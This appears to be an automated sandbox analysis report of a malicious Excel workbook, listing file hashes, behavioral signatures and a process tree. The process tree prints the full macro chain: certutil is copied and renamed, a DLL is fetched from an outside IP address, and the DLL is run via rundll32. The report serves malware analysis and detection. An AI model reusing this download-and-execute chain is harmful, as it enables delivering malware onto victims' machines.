Analysis
-
max time kernel
147s -
max time network
121s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
10-06-2021 19:14
Behavioral task
behavioral1
Sample
cancel_sub_VCP1234567890123.xlsb
Resource
win7v20210408
Behavioral task
behavioral2
Sample
cancel_sub_VCP1234567890123.xlsb
Resource
win10v20210410
General
-
Target
cancel_sub_VCP1234567890123.xlsb
-
Size
123KB
-
MD5
9e1ee4a42c381eabcf2cde38a1aae7c9
-
SHA1
015bb306d9e54001d433b3ac2e7212b864f54ae2
-
SHA256
fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3
-
SHA512
d8955c76657c68542ebcd1fc0b14b69917976892a2005ff0fcace3754200d52c4557235e083b76f4115cc940281dbe77a8e390e8bd18fbe9d5cdb128191580ec
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 892 332 cmd.exe EXCEL.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 412 332 cmd.exe EXCEL.EXE -
Executes dropped EXE 1 IoCs
Processes:
TTObk2.exepid process 1696 TTObk2.exe -
Loads dropped DLL 1 IoCs
Processes:
EXCEL.EXEpid process 332 EXCEL.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 332 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 332 EXCEL.EXE 332 EXCEL.EXE 332 EXCEL.EXE 332 EXCEL.EXE 332 EXCEL.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 332 wrote to memory of 892 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 892 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 892 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 892 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 1696 332 EXCEL.EXE TTObk2.exe PID 332 wrote to memory of 1696 332 EXCEL.EXE TTObk2.exe PID 332 wrote to memory of 1696 332 EXCEL.EXE TTObk2.exe PID 332 wrote to memory of 1696 332 EXCEL.EXE TTObk2.exe PID 332 wrote to memory of 412 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 412 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 412 332 EXCEL.EXE cmd.exe PID 332 wrote to memory of 412 332 EXCEL.EXE cmd.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe PID 412 wrote to memory of 2036 412 cmd.exe rundll32.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb1⤵
- Loads dropped DLL
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe2⤵
- Process spawned unexpected child process
-
C:\programdata\TTObk2\TTObk2.exe"C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\TTObk2\TTObk2.exeMD5
7b973145f7e1b59330ca4dd1f86b3d55
SHA110ce9174bff4856083e6adad0094a798ced2c079
SHA256589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4
SHA5121e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4
-
C:\programdata\TTObk2\TTObk2.exeMD5
7b973145f7e1b59330ca4dd1f86b3d55
SHA110ce9174bff4856083e6adad0094a798ced2c079
SHA256589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4
SHA5121e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4
-
\ProgramData\TTObk2\TTObk2.exeMD5
7b973145f7e1b59330ca4dd1f86b3d55
SHA110ce9174bff4856083e6adad0094a798ced2c079
SHA256589229e2bd93100049909edf9825dce24ff963a0c465d969027db34e2eb878b4
SHA5121e910be2a19a13e6f07f290fc5de8f44a3d1427eb216928bd9230337e3c604b1b782acd373e2d051fc3521280610cb05a95cb95ff2e1db110a4593e55709e9b4
-
memory/332-59-0x000000002FD71000-0x000000002FD74000-memory.dmpFilesize
12KB
-
memory/332-60-0x0000000071211000-0x0000000071213000-memory.dmpFilesize
8KB
-
memory/332-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/412-68-0x0000000000000000-mapping.dmp
-
memory/892-62-0x0000000000000000-mapping.dmp
-
memory/1696-65-0x0000000000000000-mapping.dmp
-
memory/1696-67-0x0000000075FF1000-0x0000000075FF3000-memory.dmpFilesize
8KB
-
memory/2036-69-0x0000000000000000-mapping.dmp